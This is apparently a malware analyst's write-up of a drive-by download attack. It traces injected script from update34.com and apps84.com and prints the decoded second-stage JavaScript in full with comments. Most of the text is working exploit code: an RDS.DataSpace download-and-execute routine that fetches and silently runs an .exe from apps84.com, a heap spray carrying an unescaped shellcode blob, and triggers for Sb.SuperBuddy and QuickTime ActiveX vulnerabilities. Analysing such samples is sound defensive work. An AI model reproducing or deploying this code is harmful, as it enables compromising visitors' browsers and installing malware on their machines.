www.update34.com/b.js
This newly injected domain loads a hidden iframe from http://apps84.com/cgi-bin/index.cgi?ad
index.cgi?ad is obfuscated JavaScript; once decoded, it downloads further code — depending on the browser version and language setting — from http://apps84.com/cgi-bin/index.cgi?ffd34c3e0100f0600077e0ed58060000000002b7b2ae43ff%5Bcode]
Interestingly, the downloaded code is yet another obfuscated JavaScript. Decoding it with the same method yields the following code:
// Analyst annotation of the decoded second-stage script. Function and variable
// names are the sample's randomised originals; comments describe only what the
// visible code does. Indicators present in this listing: the apps84.com URLs,
// the <object> CLSID BD96C556-65A3-11D0-983A-00C04FC29E36, the ProgIDs
// msxml2.XMLHTTP / Microsoft.XMLHTTP / MSXML2.ServerXMLHTTP / ADODB.Stream /
// WScript.Shell / Shell.Application / Sb.SuperBuddy / QuickTime.QuickTime.4,
// the cookies "id" and "addt", and a dropped file c:\<6 random chars>.exe.

// Returns a random string of length C9a5yGFZ drawn from the alphabet below
// (note it omits the letter 'j'). Only used to name the dropped executable.
function q37Qot3M(C9a5yGFZ) {
    var qPjQyRih = "abcdefghiklmnopqrstuvwxyz0123456789";
    var Z4mYjfqe = '';
    for (var ayDbH97x=0; ayDbH97x<C9a5yGFZ; ayDbH97x++) {
        var UxA8KpPP = Math.floor(Math.random() * qPjQyRih.length);
        Z4mYjfqe += qPjQyRih.substring(UxA8KpPP, UxA8KpPP+1);
    }
    return Z4mYjfqe;
}

// Instantiates the COM ProgID zDW_Nrnc through the <object> element gqzRhsXa
// (created in GpU6LOfo). Six CreateObject/GetObject call forms are tried via
// eval until one yields an object; every failure is swallowed. Presumably the
// detour through the <object> element exists to avoid the prompts a direct
// new ActiveXObject(...) would raise — not provable from this code alone.
function rRr2voNt(gqzRhsXa, zDW_Nrnc) {
    var UqeZTIIs = null;
    var ewf9BHSL = 'UqeZTIIs=gqzRhsXa.';
    var pb4SCZne = new Array(
        'CreateObject(zDW_Nrnc)',
        'CreateObject(zDW_Nrnc, "")',
        'CreateObject(zDW_Nrnc, "", "")',
        'GetObject("", zDW_Nrnc)',
        'GetObject(zDW_Nrnc, "")',
        'GetObject(zDW_Nrnc)'
    );
    var ibygzrSi=0;
    while(!UqeZTIIs && ibygzrSi < pb4SCZne.length) {
        try { eval(ewf9BHSL+pb4SCZne[ibygzrSi]); } catch(e) { }
        ibygzrSi++;
    }
    return UqeZTIIs;
}

// Synchronous GET of nmg1Ya8Z through the XMLHTTP object rDx3Y3YK.
// Returns the raw responseBody, or 0 if open()/send() throw.
function EQnpdJ3R(rDx3Y3YK, nmg1Ya8Z) {
    try {
        rDx3Y3YK.open("GET", nmg1Ya8Z, false);
        rDx3Y3YK.send(null);
    } catch(e) { return 0; }
    return rDx3Y3YK.responseBody;
}

// Writes nlpYQQkD to the path GGib1Bbs via an ADODB.Stream (kJVv5iSV).
// Per the ADODB constants: Type 1 = binary, Mode 3 = read/write,
// SaveToFile option 2 = create-or-overwrite. Returns 1 on success, 0 on
// any exception.
function iFzeRt3v(kJVv5iSV, GGib1Bbs, nlpYQQkD) {
    try {
        kJVv5iSV.Type = 1;
        kJVv5iSV.Mode = 3;
        kJVv5iSV.Open();
        kJVv5iSV.Write(nlpYQQkD);
        kJVv5iSV.SaveToFile(GGib1Bbs, 2);
        kJVv5iSV.Close();
    } catch(e) { return 0; }
    return 1;
}

// Download-and-execute. Fetches fjt4aEGK with EQnpdJ3R, saves the bytes as
// c:\<6 random chars>.exe with iFzeRt3v, then launches that file:
// WScript.Shell.Run(path, 0) when GFWQLQNh is 0, otherwise
// Shell.Application.ShellExecute(path, "", "", "open", 0). The trailing 0 in
// both calls is the window-style argument (hidden). Returns 1 once a launch
// call returns without throwing, else 0.
// Host-side artefact for detection: a browser-spawned process whose image is
// a short random-named .exe at the root of C:\.
function l8NTJVdS(fjt4aEGK, rDx3Y3YK, kJVv5iSV, f8ooKsQo, GFWQLQNh) {
    var ybDUybhC = 0;
    var HgFYBJZD = EQnpdJ3R(rDx3Y3YK, fjt4aEGK);
    if (HgFYBJZD != 0) {
        var lJ99WYEL = "c:\\"+q37Qot3M(6)+".exe";
        if (iFzeRt3v(kJVv5iSV, lJ99WYEL, HgFYBJZD) == 1) {
            if (GFWQLQNh == 0) {
                try { f8ooKsQo.Run(lJ99WYEL, 0); ybDUybhC = 1; } catch(e) { }
            } else {
                try { f8ooKsQo.ShellExecute(lJ99WYEL, "", "", "open", 0); ybDUybhC = 1; } catch(e) { }
            }
        }
    }
    return ybDUybhC;
}

// Stage 1: download-and-execute through an <object> element with the CLSID
// below (commonly the RDS.DataSpace control — verify against the registry).
// From it the script obtains an XMLHTTP object (three ProgIDs tried),
// ADODB.Stream, and WScript.Shell or, failing that, Shell.Application
// (nAn0J9zC is then set to 1 so l8NTJVdS uses ShellExecute). With all three
// present it fetches VGCo6zkO + "0" — bc_CUBHX is 1, so exactly one URL —
// and runs the result. Returns 1 if a payload was launched. All exceptions
// are swallowed.
function GpU6LOfo() {
    var rEoXWlfi = 0;
    var bc_CUBHX = 1;
    var VGCo6zkO = "http://apps84.com/cgi-bin/index.cgi?ff4a457c0100f0600277e0ed58060000000002b72ba2710001040900000000020";
    var kf4nCFPY = new Array(null, null, null);
    try {
        var nAn0J9zC = 0;
        var rv9jQ4yP = document.createElement("object");
        rv9jQ4yP.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
        if (rv9jQ4yP) {
            kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "msxml2.XMLHTTP");
            if (!kf4nCFPY[0]) kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "Microsoft.XMLHTTP");
            if (!kf4nCFPY[0]) kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "MSXML2.ServerXMLHTTP");
            kf4nCFPY[1] = rRr2voNt(rv9jQ4yP, "ADODB.Stream");
            kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "WScript.Shell");
            if (!kf4nCFPY[2]) {
                kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "Shell.Application");
                if (kf4nCFPY[2]) nAn0J9zC = 1;
            }
        }
        if (kf4nCFPY[0] && kf4nCFPY[1] && kf4nCFPY[2]) {
            for(var ELxcGHTj=0;ELxcGHTj<bc_CUBHX;ELxcGHTj++) {
                var GH3tzsho = l8NTJVdS(VGCo6zkO+ELxcGHTj.toString(), kf4nCFPY[0], kf4nCFPY[1], kf4nCFPY[2], nAn0J9zC);
                if (!rEoXWlfi) rEoXWlfi = GH3tzsho;
            }
        }
    } catch(e) {}
    return rEoXWlfi;
}

// Tracking cookies. Sets id=<NpTt78SK> and/or addt=<vyRa5Vhw> on path "/"
// with an expiry 120000 days out. The callers pass 9 (SuperBuddy path) and
// 6 (QuickTime path), so the "id" cookie records which stage was attempted;
// these cookie names are a cheap client-side indicator.
function z15QLzDF(NpTt78SK, vyRa5Vhw) {
    try {
        var bcUSP1AU = new Date();
        bcUSP1AU.setDate(bcUSP1AU.getDate() + 120000);
        if (NpTt78SK) {
            document.cookie = "id=" + NpTt78SK + "; path=/" + "; expires=" + bcUSP1AU.toGMTString();
        }
        if (vyRa5Vhw) {
            document.cookie = "addt=" + vyRa5Vhw + "; path=/" + "; expires=" + bcUSP1AU.toGMTString();
        }
    } catch(e) { }
}

// Heap-spray state: the array that holds the sprayed strings, and a flag so
// S3czSfbD sprays at most once.
var lajutPnm = new Array();
var xnyWSACx = 0;

// Re-schedules itself every 100 ms. The self-assignment is a no-op; the only
// observable effect is a timer that keeps referencing lajutPnm — presumably
// to keep the sprayed strings alive while the ActiveX calls run (inference).
function t02H59nf() {
    lajutPnm = lajutPnm;
    setTimeout(t02H59nf, 100);
}

// Grows qXNjDqmd by repeated doubling until its length*2 reaches aDNIjIpy,
// then trims it to aDNIjIpy/2 characters (i.e. aDNIjIpy bytes of UTF-16).
function wuWdTHTE(qXNjDqmd, aDNIjIpy) {
    while (qXNjDqmd.length*2<aDNIjIpy) qXNjDqmd += qXNjDqmd;
    qXNjDqmd = qXNjDqmd.substring(0,aDNIjIpy/2);
    return qXNjDqmd;
}

// Heap spray, executed once (guarded by xnyWSACx). V2dJq4HP = 0x0c0c0c0c is
// the value later passed to the vulnerable ActiveX methods. Each sprayed
// string is padding of repeated 0x0c0c0c0c followed by the unescape()d
// shellcode qsNDyV7P, sized so the whole string is 0x400000 bytes less 0x38
// (presumably string-object overhead — not derivable from this code).
// (0x0c0c0c0c - 0x400000)/0x400000 such strings are stored in lajutPnm.
// The shellcode bytes are not decoded in this listing; treat them as an
// opaque payload. Always returns 0.
function S3czSfbD() {
    if (!xnyWSACx) {
        var V2dJq4HP = 0x0c0c0c0c;
        var qsNDyV7P = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018d%u0000%ue4b0%u4530%u4500%u7549%uebf9%u7400%u7474%u7474%u7474%u0d74%ue418%ue4e4%u80bb%ud445%ue4e4%u9ce4%u6fe8%ue8a4%u946f%u49f8%u8c6f%u0fec%u6fed%ud0a4%ua469%u6f98%ud88c%u136f%ue08e%u0cbd%ue46b%ue4e4%u1d06%u8b8c%ue48a%u8ce4%u9691%u8988%u1bb0%u6ff2%u0c0c%ue49d%ue4e4%u336f%u64a3%ue4db%u1e91%ub3a3%u64a3%ue4db%u1e91%u0b6f%ud7bb%u652d%ue008%ue4e5%u6fe4%ub538%ub7b6%ue08c%ue4e5%u1be4%ue8b2%ubdbe%ub6b5%ue66f%ua7b7%udf64%u91e4%u651e%u189f%u81ca%u819c%ue791%u0f67%u6dec%u23e7%ue0a7%u81ca%u819c%ua722%ue4ec%u6ebf%ue025%u6cd4%ue4a1%u24d7%ub4b4%ub3b7%u1bb4%uf4b2%u1c67%u91e4%u8ee2%ub7e5%ub21b%ubee0%u67bd%ue026%u64a5%ue4de%u5091%ub21b%ub5ec%u6fb2%ud891%u906f%u9cca%u11e7%u6fb2%uc492%u11e7%u2dd7%ua5ad%ue749%ud721%ueb3f%uf45a%u32de%uec90%u2f25%ue7e9%ua43e%u150f%ufbdf%u0391%u6fba%uc0ba%u39e7%u6f82%uafe8%uba6f%ue7f8%u6f39%u6fe0%u21e7%uba4f%u27bd%u1b0c%u1b1a%u6a1b%ueaaa%u7c08%u6e1a%u9aea%u063c%ud797%u6e2e%ud2bf%ucbfe%u9494%u8c83%ue4a3%u908c%u9490%ucbde%u85cb%u9494%udc97%ucad0%u8b87%ucb89%u8387%uc98d%u8d86%ucb8a%u8a8d%u8180%uca9c%u8387%udb8d%u8282%u85d0%ud1d0%u87d3%ud5d4%ud4d4%ud482%ud4d2%ud6d4%ud3d3%ud481%u8081%udcd1%ud2d4%ud4d4%ud4d4%ud4d4%ud4d4%ud6d4%ud386%u86d6%ud685%ud5d3%ud4d4%ud5d4%ud0d4%uddd4%ud4d4%ud4d4%ud4d4%ud4d4%udcd4%ue4d4");
        var yuVqerxP = 0x400000;
        var FDatJxfq = qsNDyV7P.length * 2;
        var aDNIjIpy = yuVqerxP - (FDatJxfq+0x38);
        var qXNjDqmd = unescape("%u0c0c%u0c0c");
        qXNjDqmd = wuWdTHTE(qXNjDqmd,aDNIjIpy);
        var NGNogBza = (V2dJq4HP - 0x400000)/yuVqerxP;
        for (var U4Dn_RUx=0;U4Dn_RUx<NGNogBza;U4Dn_RUx++) {
            lajutPnm[U4Dn_RUx] = qXNjDqmd + qsNDyV7P;
        }
        xnyWSACx = 1;
        t02H59nf();
    }
    return 0;
}

// Stage 2: the Sb.SuperBuddy control. If it instantiates, spray the heap,
// set cookie id=9, then call LinkSBIcons with the sprayed address.
// Always returns 0, so the caller's || chain never short-circuits here.
function JgIeEAxw() {
    try {
        var YNu_L1Ip = new ActiveXObject('Sb.SuperBuddy');
        if (YNu_L1Ip) {
            S3czSfbD();
            z15QLzDF(9);
            YNu_L1Ip.LinkSBIcons(0x0c0c0c0c);
        }
    } catch(e) { }
    return 0;
}

// Stage 3: the QuickTime.QuickTime.4 control. Sprays the heap, builds
// mk84Pufq (803 bytes of "A" followed by three 0x0c0c0c0c words), sets
// cookie id=6 and appends a <div> whose innerHTML is a qtnext1 <param>.
// In this dump Et27CeXt is reduced to a chain of empty strings around that
// <param> and mk84Pufq is never referenced, so the surrounding markup was
// most likely stripped when the write-up was rendered; the original sample
// presumably placed mk84Pufq there. gAqc_6tX is assigned without var and so
// becomes an implicit global. Always returns 0.
function zmpCkFBI() {
    try {
        var plv4KWFi = new ActiveXObject("QuickTime.QuickTime.4");
        if (plv4KWFi) {
            S3czSfbD();
            var mk84Pufq = "";
            for(var Zxae7BbE=0;Zxae7BbE<200;Zxae7BbE++) { mk84Pufq += "AAAA"; }
            mk84Pufq += "AAA";
            for(var Zxae7BbE=0;Zxae7BbE<3;Zxae7BbE++) { mk84Pufq += "\x0c\x0c\x0c\x0c"; }
            var Et27CeXt = '' + '' + '' + '' + '<param name="qtnext1" value="T">' + '' + '';
            gAqc_6tX = 0;
            var eBUg1ask = document.createElement("div");
            eBUg1ask.innerHTML = Et27CeXt;
            z15QLzDF(6);
            document.body.appendChild(eBUg1ask);
        }
    } catch(e) { }
    return 0;
}

// Entry point: the three stages run in order until one returns truthy.
// Only GpU6LOfo can return 1; the other two always return 0, so in practice
// all three are attempted. Both branches assign the same value and the
// redirect that would have consumed it is commented out below, so the
// outcome has no visible effect beyond the cookies and any launched process.
if (GpU6LOfo() || JgIeEAxw() || zmpCkFBI() ) {
    document.XQYxMigz = 'about:blank';
} else {
    document.XQYxMigz = 'about:blank';
}
/*setTimeout(function() { if (document.gAqc_6tX && document.mEWDIx_N && document.Z4lSVtbt) { setTimeout("window.location = '" + document.XQYxMigz + "';", 1000); } else { setTimeout(arguments.callee, 1000); } }, 1000);*/